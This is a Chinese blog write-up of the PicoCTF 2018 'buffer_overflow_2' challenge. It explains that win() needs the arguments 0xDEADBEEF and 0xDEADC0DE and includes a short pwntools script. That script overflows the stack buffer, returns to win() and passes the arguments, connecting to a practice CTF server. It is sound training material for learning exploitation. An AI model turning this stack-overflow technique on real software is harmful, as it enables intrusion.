PicoCTF_2018_buffer_overflow_2

PicoCTF_2018_buffer_overflow_2

使用checksec查看:
在这里插入图片描述
开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化

唯一做了变动的是win()函数:
在这里插入图片描述
上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1a2

  • a1需要等于0xDEADBEEF
  • a2需要等于0xDEADC0DE

才能读取到flag。

那么直接传参即可,秒了。

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",26088)
# r = process("../buu/PicoCTF_2018_buffer_overflow_2")

#params
win_addr = 0x80485CB

#attack
payload = b'M'*(0x6c + 4) + p32(win_addr) + b'M'*4 +  p32(0xDEADBEEF) + p32(0xDEADC0DE)
r.recv()
r.sendline(payload)

r.interactive()
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值